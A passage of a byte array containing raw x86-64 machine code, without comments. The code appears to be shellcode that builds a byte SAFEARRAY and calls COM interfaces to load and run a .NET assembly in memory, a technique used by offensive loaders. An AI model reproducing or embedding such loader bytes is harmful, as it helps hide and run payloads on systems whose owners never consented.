698 0x00, 0x00, 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0e,
699 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x00, 0x00, 0x00,
700 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x78, 0x13, 0x48,
701 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00,
702 0x00, 0x48, 0x85, 0xc0, 0x75, 0x52, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00,
703 0x00, 0x48, 0x8b, 0x80, 0x70, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x10,
704 0x02, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x10, 0x48, 0x8b, 0x8d, 0x00, 0x02,
705 0x00, 0x00, 0x4c, 0x8d, 0x81, 0x64, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x8d,
706 0x00, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc1, 0x54, 0x08, 0x00, 0x00, 0x48,
707 0x89, 0x54, 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba, 0x00,
708 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85,
709 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x79,
710 0x19, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x10,
711 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x20, 0x03,
712 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40,
713 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x50, 0x48, 0x8b, 0x85, 0x10,
714 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0xff, 0xd2,
715 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00,
716 0x00, 0x0f, 0x88, 0xe5, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x02,
717 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x01, 0x00, 0x00, 0x84, 0xc0, 0x75,
718 0x39, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10,
719 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x40, 0x68, 0x48, 0x8b, 0x85, 0x10, 0x02,
720 0x00, 0x00, 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00,
721 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89,
722 0x85, 0xec, 0x01, 0x00, 0x00, 0xe9, 0x9f, 0x00, 0x00, 0x00, 0x48, 0x8b,
723 0x85, 0x08, 0x02, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x01, 0x00, 0x00, 0x48,
724 0x8d, 0x55, 0xb0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
725 0x00, 0x02, 0x00, 0x00, 0xe8, 0x5c, 0xe9, 0xff, 0xff, 0x48, 0x8b, 0x85,
726 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x48,
727 0x8d, 0x45, 0xb0, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x85, 0xd8,
728 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
729 0x40, 0x10, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x60, 0x48, 0x8b, 0x85,
730 0x10, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x18, 0x48, 0x8b, 0x85, 0x10,
731 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x95, 0xd8, 0x01,
732 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48,
733 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x48,
734 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x10, 0x01, 0x00,
735 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff,
736 0xd2, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xee, 0x01,
737 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40,
738 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x08, 0x48, 0x8b, 0x85, 0x10, 0x02,
739 0x00, 0x00, 0x48, 0x8d, 0x48, 0x20, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00,
740 0x00, 0x48, 0x8d, 0x90, 0x74, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10,
741 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x49, 0x89, 0xc8, 0x48, 0x89,
742 0xc1, 0x41, 0xff, 0xd1, 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd,
743 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x9d, 0x01, 0x00, 0x00, 0xc7,
744 0x85, 0xc4, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
745 0x08, 0x02, 0x00, 0x00, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x89, 0x85,
746 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48,
747 0x8b, 0x80, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x01, 0x00,
748 0x00, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xb9, 0x11, 0x00,
749 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48,
750 0x83, 0xbd, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x47, 0x01, 0x00,
751 0x00, 0xc7, 0x85, 0xe8, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
752 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89,
753 0x85, 0xc8, 0x01, 0x00, 0x00, 0xeb, 0x2f, 0x8b, 0x95, 0xe8, 0x01, 0x00,
754 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02,
755 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe8, 0x01, 0x00,
756 0x00, 0x0f, 0xb6, 0x84, 0x02, 0x28, 0x05, 0x00, 0x00, 0x88, 0x01, 0x83,
757 0x85, 0xe8, 0x01, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x08, 0x02, 0x00,
758 0x00, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x39, 0x85, 0xe8, 0x01, 0x00,
759 0x00, 0x72, 0xbc, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
760 0x40, 0x20, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x88, 0x68, 0x01, 0x00, 0x00,
761 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x28, 0x48,
762 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x8b,
763 0x95, 0xd0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41,
764 0xff, 0xd1, 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01,
765 0x00, 0x00, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0xe4,
766 0x01, 0x00, 0x00, 0xc7, 0x85, 0xe8, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
767 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10,
768 0x48, 0x89, 0x85, 0xc8, 0x01, 0x00, 0x00, 0xeb, 0x44, 0x48, 0x8b, 0x95,
769 0x08, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe8, 0x01, 0x00, 0x00, 0xc6, 0x84,
770 0x02, 0x28, 0x05, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xe8, 0x01, 0x00, 0x00,
771 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x48,
772 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe8, 0x01, 0x00, 0x00,
773 0x0f, 0xb6, 0x84, 0x02, 0x28, 0x05, 0x00, 0x00, 0x88, 0x01, 0x83, 0x85,
774 0xe8, 0x01, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x08, 0x02, 0x00, 0x00,
775 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x39, 0x85, 0xe8, 0x01, 0x00, 0x00,
776 0x72, 0xa7, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x90,
777 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48,
778 0x89, 0xc1, 0xff, 0xd2, 0x8b, 0x85, 0xe4, 0x01, 0x00, 0x00, 0x48, 0x81,
779 0xc4, 0x70, 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec,
780 0x68, 0x03, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00,
781 0x48, 0x89, 0x8d, 0x00, 0x03, 0x00, 0x00, 0x48, 0x89, 0x95, 0x08, 0x03,
782 0x00, 0x00, 0x4c, 0x89, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x85,
783 0xd8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xa8,
784 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x30, 0x02,
785 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x38, 0x02, 0x00,
786 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x40, 0x02, 0x00, 0x00,
787 0x00, 0x00, 0x00, 0x00, 0x66, 0xc7, 0x85, 0x0a, 0x02, 0x00, 0x00, 0x00,
788 0x00, 0x48, 0x8b, 0x85, 0x08, 0x03, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8,
789 0x02, 0x0f, 0x85, 0xc1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03,
790 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x80,
791 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48,
792 0x8d, 0x50, 0x38, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b,
793 0x40, 0x28, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85, 0xd4, 0x02,
794 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x69,
795 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b,
796 0x40, 0x38, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00,
797 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48,
798 0x8d, 0x95, 0xa8, 0x02, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0,
799 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x02, 0x00, 0x00,
800 0x00, 0x0f, 0x88, 0x80, 0x06, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03,
801 0x00, 0x00, 0x4c, 0x8b, 0x88, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
802 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x00, 0x02, 0x00, 0x00, 0x49,
803 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff,
804 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03,
805 0x00, 0x00, 0x4c, 0x8b, 0x88, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
806 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x04, 0x02, 0x00, 0x00, 0x49,
807 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff,
808 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x8b, 0x85, 0x04, 0x02, 0x00,
809 0x00, 0x8b, 0x95, 0x00, 0x02, 0x00, 0x00, 0x29, 0xd0, 0x83, 0xc0, 0x01,
810 0x89, 0x85, 0xb4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xb4, 0x02, 0x00, 0x00,
811 0x00, 0x0f, 0x84, 0xe5, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03,
812 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe0, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01,
813 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00,
814 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x8b,
815 0x85, 0x08, 0x03, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00,
816 0x84, 0xc0, 0x0f, 0x84, 0xf7, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08,
817 0x03, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55,
818 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x03,
819 0x00, 0x00, 0xe8, 0xf6, 0xe4, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00, 0x03,
820 0x00, 0x00, 0x4c, 0x8b, 0x80, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55,
821 0xec, 0x48, 0x8d, 0x45, 0xf0, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x48,
822 0x89, 0x85, 0xb8, 0x02, 0x00, 0x00, 0x66, 0xc7, 0x85, 0x50, 0x02, 0x00,
823 0x00, 0x08, 0x20, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b,
824 0x80, 0xe0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x41, 0x89, 0xd0, 0xba,
825 0x00, 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
826 0x89, 0x85, 0x58, 0x02, 0x00, 0x00, 0xc7, 0x85, 0x0c, 0x02, 0x00, 0x00,
827 0x00, 0x00, 0x00, 0x00, 0xeb, 0x66, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00,
828 0x00, 0x48, 0x8b, 0x98, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00,
829 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x8b, 0x85,
830 0x0c, 0x02, 0x00, 0x00, 0x89, 0xc0, 0x48, 0x8d, 0x0c, 0xc5, 0x00, 0x00,
831 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x02, 0x00, 0x00, 0x48, 0x01, 0xc8,
832 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0xc1, 0x48,
833 0x8b, 0x85, 0x58, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00,
834 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0x8b, 0x85, 0x0c,
835 0x02, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0x85, 0x0c, 0x02, 0x00, 0x00,
836 0x8b, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x39, 0xd0, 0x72,
837 0x8d, 0xeb, 0x7b, 0x66, 0xc7, 0x85, 0x50, 0x02, 0x00, 0x00, 0x08, 0x20,
838 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe0, 0x00,
839 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00,
840 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x58,
841 0x02, 0x00, 0x00, 0xc7, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
842 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xe8,
843 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b,
844 0x90, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x0a, 0x02, 0x00, 0x00,
845 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x85, 0x58,
846 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00, 0x00, 0x49, 0x89,
847 0xc8, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0xc7, 0x85, 0x0c, 0x02, 0x00, 0x00,
848 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x4c,
849 0x8b, 0x88, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x50, 0x02, 0x00,
850 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8,
851 0x02, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1,
852 0x66, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x01, 0x00, 0x48, 0xc7, 0x85,
853 0x38, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10,
854 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x4c, 0x8b,
855 0x90, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00,
856 0x48, 0x8b, 0x48, 0x38, 0x48, 0x8b, 0x85, 0x30, 0x02, 0x00, 0x00, 0x48,
857 0x8b, 0x95, 0x38, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x89,
858 0x55, 0xc8, 0x48, 0x8b, 0x85, 0x40, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45,
859 0xd0, 0x4c, 0x8d, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xd8,
860 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xc0, 0x4d, 0x89, 0xc1, 0x49, 0x89,
861 0xd0, 0x48, 0x89, 0xc2, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xd4, 0x02, 0x00,
862 0x00, 0x48, 0x83, 0xbd, 0xd8, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x90,
863 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b,
864 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x58, 0x02, 0x00, 0x00,
865 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00,
866 0x48, 0x8b, 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x02,
867 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0xe9, 0x57, 0x03, 0x00, 0x00,
868 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x38, 0x00,
869 0x00, 0x00, 0x00, 0xe9, 0x43, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08,
870 0x03, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x55,
871 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x03,
872 0x00, 0x00, 0xe8, 0x7a, 0xe2, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00, 0x03,
873 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45,
874 0xf0, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x85, 0xc8, 0x02, 0x00,
875 0x00, 0x48, 0x83, 0xbd, 0xc8, 0x02, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8,
876 0x00, 0x00, 0x00, 0x00, 0xe9, 0xf3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
877 0x08, 0x03, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8d,
878 0x55, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00,
879 0x03, 0x00, 0x00, 0xe8, 0x25, 0xe2, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00,
880 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8d,
881 0x45, 0xf0, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x85, 0xc0, 0x02,
882 0x00, 0x00, 0x48, 0x83, 0xbd, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84,
883 0x85, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48,
884 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x88, 0x88, 0x00, 0x00,
885 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x30,
886 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48,
887 0x8b, 0x95, 0xc8, 0x02, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1,
888 0x41, 0xff, 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xd4,
889 0x02, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x1d, 0x02, 0x00, 0x00, 0x48, 0xc7,
890 0x85, 0xd8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
891 0x08, 0x03, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84,
892 0xc0, 0x0f, 0x84, 0x4a, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x03,
893 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xf0,
894 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x03, 0x00,
895 0x00, 0xe8, 0x67, 0xe1, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00,
896 0x00, 0x4c, 0x8b, 0x80, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xec,
897 0x48, 0x8d, 0x45, 0xf0, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x48, 0x89,
898 0x85, 0xb8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00,
899 0x48, 0x8b, 0x80, 0xe0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x41, 0x89,
900 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00, 0x00, 0xff,
901 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xd8,
902 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xcf, 0x00, 0x00, 0x00, 0xc7, 0x85,
903 0x0c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xaf, 0x00, 0x00,
904 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08,
905 0x01, 0x00, 0x00, 0x8b, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x89, 0xc0, 0x48,
906 0x8d, 0x0c, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x02,
907 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc1, 0xff,
908 0xd2, 0x48, 0x89, 0x85, 0x98, 0x02, 0x00, 0x00, 0x66, 0xc7, 0x85, 0x90,
909 0x02, 0x00, 0x00, 0x08, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00,
910 0x4c, 0x8b, 0x88, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x90, 0x02,
911 0x00, 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
912 0xd8, 0x02, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff,
913 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x02, 0x00,
914 0x00, 0x00, 0x79, 0x25, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48,
915 0x8b, 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x02, 0x00,
916 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0xc7, 0x85, 0xd8, 0x02, 0x00,
917 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x83,
918 0xc0, 0x01, 0x89, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x8b, 0x85, 0x0c, 0x02,
919 0x00, 0x00, 0x8b, 0x55, 0xec, 0x39, 0xd0, 0x0f, 0x82, 0x40, 0xff, 0xff,
920 0xff, 0x83, 0xbd, 0xd4, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xa5, 0x00,
921 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40,
922 0x30, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x90, 0xc8, 0x01, 0x00, 0x00, 0x48,
923 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x48, 0x30, 0x48, 0x8b,
924 0x85, 0x30, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x38, 0x02, 0x00, 0x00,
925 0x48, 0x89, 0x45, 0xc0, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x85, 0x40,
926 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x02,
927 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0x02, 0x00, 0x00, 0x48, 0x89, 0x54,
928 0x24, 0x30, 0x48, 0x8b, 0x95, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x89, 0x54,
